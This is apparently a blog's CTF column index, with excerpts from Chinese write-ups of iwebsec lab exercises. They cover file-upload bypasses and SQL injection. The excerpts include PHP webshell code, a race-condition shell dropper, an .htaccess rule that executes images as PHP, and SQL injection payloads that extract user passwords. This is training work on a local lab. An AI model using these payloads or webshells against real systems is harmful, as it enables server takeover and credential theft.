![](https://img-blog.csdnimg.cn/20210531101505716.jpg?x-oss-process=image/resize,m_fixed,h_224,w_224)
CTF
CTF学习与实践
lvx++
这个作者很懒,什么都没留下…
展开
-
Bugku-Misc-贝斯手
用记事本打开介绍.txt会忽略后面内容,用VScode比较好。属猴,测试密码是1992,打开flag.txt内容是。5的意思是MD5,58的意思是base58。选择前32位进行md5解码。也可用脚本解Base58。原创 2022-07-29 10:42:36 · 1010 阅读 · 1 评论 -
CTF学习笔记22:iwebsec-文件上传漏洞-07-条件竞争文件上传
一、正常上传php文件被删除你这么暴力,刚上传就删除,解决思路就是不停地上传,你要接收文件、判断文件、删除文件总要时间吧;那我见缝插针,不停地调用上传的文件,一旦成功就写入另一ma,也就是ma中ma,试一下吧,要用两个burpsuite(双开,哈哈)二、Attack步骤(一)准备父上传文件1.php并上传<?php $f=fopen("7.php","w"); fputs($f,'<?php @eval($_POST[cmd]);?>');?>该语句在测试过程中卡了很原创 2022-03-18 20:31:23 · 5943 阅读 · 0 评论 -
CTF学习笔记21:iwebsec-文件上传漏洞-06-文件截断上传
一、通过burpsuite改扩展名等方法不能上传二、用burpsuite配合%00上传(一)在前缀框输入:6.php%00,如果为空则上传文件保存为"_随机数字+.jpg"的图片文件(二)在filename处也加入%00.gif(三)在path段,选中%00右击,选择URL-decode,否则会将%00作为普通字符处理(四)点击forward上传成功(五)虽然提示路和文件名中包含随机数字和jpg,但实际上传的文件名仅为6.php三、测试连接测试连接成功...原创 2022-03-18 18:03:21 · 1193 阅读 · 0 评论 -
CTF学习笔记20:iwebsec-文件上传漏洞-05-htaccess文件上传
一、通过之前的方法均不能上传php文件通过burpsuite配合改扩展名、大小写、双写等手段均不上传成功二、编写并上传.htaccess文件上传,将图片作为php解析编写.htaccess文件并上传,作用是将之后上传的同文件夹下的jpg文件作为php文件解析执行<FilesMatch "jpg">SetHandler application/x-httpd-php</FilesMatch>三、再直接上传之前同样图片文件,不改扩展名四、测试连接url地址中的地址原创 2022-03-11 09:10:35 · 4859 阅读 · 0 评论 -
CTF学习笔记19:iwebsec-文件上传漏洞-04-文件头过滤绕过
一、通过之前只改文件扩展名的方法不能上传二、制作图片文件copy 1.jpg/b + 1.php/a 4.jpg其中:1.jpg为任意图片文件,1.php含有一名话~,4.jpg为生成的图片ma文件内容如下:三、用burpsuite配合改扩展名上传成功文件保存路径如下四、测试连接成功...原创 2022-03-09 22:22:17 · 5384 阅读 · 0 评论 -
CTF学习笔记18:iwebsec-文件上传漏洞-03-Content-Type过滤绕过
一、正常情况只允许上传图片二、启动burpsuite上传gif文件,上传之前拦截打开拦截后,再提交三、连接测试原创 2022-02-20 21:58:33 · 2344 阅读 · 0 评论 -
CTF学习笔记17:iwebsec-文件上传漏洞-02-文件名过滤绕过
一、将文件扩展名改为.phP即可上传上传路径为up/2.phP二、测试连接原创 2022-02-20 20:18:55 · 1468 阅读 · 0 评论 -
CTF学习笔记16:iwebsec-文件上传漏洞-01-前端JS过滤绕过
一、正常情况下无法上传php文件二、分析页面js代码三、使用“Javascript Toggle On and Off”插件,关闭javascript,上传成功php文件内容如下<?php eval($_POST['cmd']);?>说明:以上代码仅用于本地测试学习!四、测试连接五、成功获取服务器控制权...原创 2022-02-20 09:31:21 · 1013 阅读 · 0 评论 -
CTF学习笔记15:iwebsec-SQL注入漏洞-13-二次注入
一、注册用户时单引号被addslashs,不能执行(一)注册前查看一下用户表假设目标是获取admin用户的密码(二)注册admin’#用户二、找回密码时注入被执行(一)页面观察准备为了更好地了解二次注入原理,修改一下reset.php源码,在页面上输出SQL语句(二)admin用户密码被找回三、其他二次注入数据观察初始数据有其他已经注入的数据,我们看下有什么作用可以看出,这是打二次注入和报错注入结合使用了。SQL注入小结自此,用周末1天半的闲暇时间完成了iwebsec原创 2022-01-23 21:54:36 · 1743 阅读 · 0 评论 -
CTF学习笔记14:iwebsec-SQL注入漏洞-12-等价函数替换过滤绕过
一、该题会替换等号二、用like代替=原创 2022-01-23 21:18:14 · 1296 阅读 · 0 评论 -
CTF学习笔记13:iwebsec-SQL注入漏洞-11-十六进制绕过
一、本题难道名不符实,用第1题数字型payload直接打出结果二、原来是payload中没有单引号,实际做题过程要一步步分析,那么来看看取列名这一步会怎样(一)果然报错:(二)原因如下:(三)用users的十六制代替?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273...原创 2022-01-23 21:09:53 · 1492 阅读 · 0 评论 -
CTF学习笔记12:iwebsec-SQL注入漏洞-10-双重url编码绕过
一、用第8题大小写绕过一样的payload就能得到结果?id=-1 union Select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users二、进行一次urlencode编码来测试一下,也可以得到结果?id=-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users原创 2022-01-23 20:52:53 · 1161 阅读 · 0 评论 -
CTF学习笔记11:iwebsec-SQL注入漏洞-09-双写关键字绕过
一、解题过程感觉题目越来越简单,只需绕过select关键字过滤即可?id=-1 union selselectect 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users原创 2022-01-23 20:40:12 · 859 阅读 · 0 评论 -
CTF学习笔记10:iwebsec-SQL注入漏洞-08-大小写过滤绕过
一、解题过程将SQL关键都换成大小写交替,最后经查看源码,本题只过滤了select?id=-1 Union Select 1,2,Group_concat(concat(username,0x7e,password)) From iwebsec.users原创 2022-01-23 20:34:25 · 906 阅读 · 0 评论 -
CTF学习笔记9:iwebsec-SQL注入漏洞-07-空格过滤绕过
一、直接上payload?id=-1%0aunion%a0select%0a1,2,group_concat(concat(username,0x7e,password))/**/from(iwebsec.users)二、以上用到了多种绕过空格的方法%a0%0a/**/()原创 2022-01-23 20:27:19 · 1427 阅读 · 0 评论 -
CTF学习笔记8:iwebsec-SQL注入漏洞-06-宽字节注入
直接上payload?id=-1%df’ union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users–+原创 2022-01-23 19:50:04 · 961 阅读 · 1 评论 -
CTF学习笔记7:iwebsec-SQL注入漏洞-05-updatexml注入
目录一、解题过程(一)直接上payload二、源码分析(一)php源码分析(二)报错注入探究1.rand和floor函数与group by的冲突2.extractvalue()函数一、解题过程(一)直接上payload?id=1^updatexml(1,concat(0x7e,(select group_concat(password) from iwebsec.users),0x7e),3)--+说明:如果输出长度受限,需要用reverse反转再拼接?id=1^updatexml(1,conc原创 2022-01-23 19:43:23 · 979 阅读 · 0 评论 -
CTF学习笔记6:iwebsec-SQL注入漏洞-04-sleep注入
目录一、解题过程(一)观察页面(二)编写脚本逐项获取数据1.获取数据库名的长度(可不做)2.获取数据库名(可不做)3.获取表名4.获取users表的列名5.获取password列的数据源码分析(一)php源码关键脚本一、解题过程(一)观察页面发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入(二)编写脚本逐项获取数据1.获取数据库名的长度(可不做)#encoding=utf-8import requestsimport osimport timeurl="ht原创 2022-01-22 23:23:55 · 473 阅读 · 0 评论 -
CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入
一、解题过程(一)观察payload与结果1.SQL执行有结果,就输出welcome to iwebsec!!!2.否则输出1(二)编写脚本逐项获取信息1.获取数据库名字符串长度先要为python安装requests包pip install requestspython代码如下:#encoding=utf-8import requestsimport osurl="http://192.168.182.130:8001/sqli/03.php"def DbLen():原创 2022-01-22 18:47:21 · 1146 阅读 · 0 评论 -
CTF学习笔记4:iwebsec-SQL注入漏洞-02-字符型注入
一、直接上payload方法:宽字节注入?id=-1%df' union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+或?id=-1%df%5c%27 union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+二、源码分析(一)查看源文件addslashes()是PHP函原创 2022-01-22 17:43:09 · 816 阅读 · 0 评论 -
CTF学习笔记3:mysql读文件与写文件
目录一、前提条件(一)查看导入导出权限配置(二)查看当前用户(三)查看当前用户的文件读写权限(四)为实验修改配置重启服务(五)检查配置效果二、读写文件测试(一)生成测试文件(二)读取文件(三)写入文件(四)检查写入效果一、前提条件1.对web目录具有读写权限2.知道文件绝对路径3.能够使用联合查询(一)查看导入导出权限配置mysql> show variables like "secure_file_priv";+------------------+-------+| Variabl原创 2022-01-22 16:38:24 · 864 阅读 · 0 评论 -
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。一、解题过程用到的工具:Chrome浏览器和HackerBar插件(一)题目概览1.题目路径2.HackerBar使用3.测试结果集列数为3列?id=1 order by 44.给id传递-1再用union select查询自己想要的数据(1)取得当前应用的数据库名?id=-1 union sele原创 2022-01-22 15:46:50 · 3313 阅读 · 0 评论 -
一道SSTI题
做题时花了较多时间,截了个图原创 2022-01-15 15:23:59 · 105 阅读 · 0 评论 -
BurpSuite分析https与Chrome浏览器设置
目录一、安装BurpSuite、Chrome并安装SwitchyOmega插件二、打开https页面出错三、在BurpSuite中导出证书四、在Chrome中导入证书四、导入成功后重启Chrome即可愉快地抓包了一、安装BurpSuite、Chrome并安装SwitchyOmega插件操作过程略,下图主要是设置好端口二、打开https页面出错三、在BurpSuite中导出证书导出到桌面a.der四、在Chrome中导入证书四、导入成功后重启Chrome即可愉快地抓包了..原创 2022-01-09 21:28:53 · 2277 阅读 · 0 评论 -
CTF学习笔记1:git泄露有关知识
一般情况环境准备#先进入/var/www/html目录git initvi flag #新增一个flag文件并保存git add flag #向仓库增加flag文件git commit -m "flag"scrabble获取flag工具:scrabble./scrabble http://localhost/ #会下载flag文件需要回滚修改flag文件#先进入/var/www/htm目录原创 2021-05-31 09:41:39 · 1157 阅读 · 0 评论